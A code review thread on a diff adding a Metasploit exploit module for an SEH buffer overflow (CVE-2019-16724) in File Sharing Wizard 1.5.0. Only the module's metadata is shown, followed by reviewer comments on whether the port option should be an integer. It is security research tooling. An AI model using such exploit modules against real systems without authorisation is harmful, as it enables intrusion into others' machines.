modules/exploits/windows/http/file_sharing_wizard_seh.rb

```diff
@@ -0,0 +1,57 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super update_info(info,
+                      'Name' => 'File Sharing Wizard 1.5.0 - POST SEH Overflow',
+                      'Description' => %q(
+        This module exploits a SEH based buffer overflow in an HTTP POST parameter in File Sharing Wizard 1.5.0
+      ),
+                      'Author' => [
+                        'x00pwn', # Original exploit
+                        'Dean Welch <dean_welch[at]rapid7.com>' # Module
+                      ],
+                      'License'        => MSF_LICENSE,
+                      'References'     =>
+                          [
+                            %w(CVE 2019-16724),
+                            %w(EDB 47412)
+                          ],
+                      'Payload' =>
+                          {
+                            BadChars: "\x00\x20"
+                          },
+                      'DisclosureDate' => '2019-09-24',
+                      'DefaultOptions' =>
+                          {
+                            RPORT: "80",
```

Comment:
Integer, not string.

Reply:
huh, good point, surprised this works

Reply:
Normalization in the API! But best practice is to do what the API expects.

Reply:
Confirmed that this still works, but only if the hash keys are strings.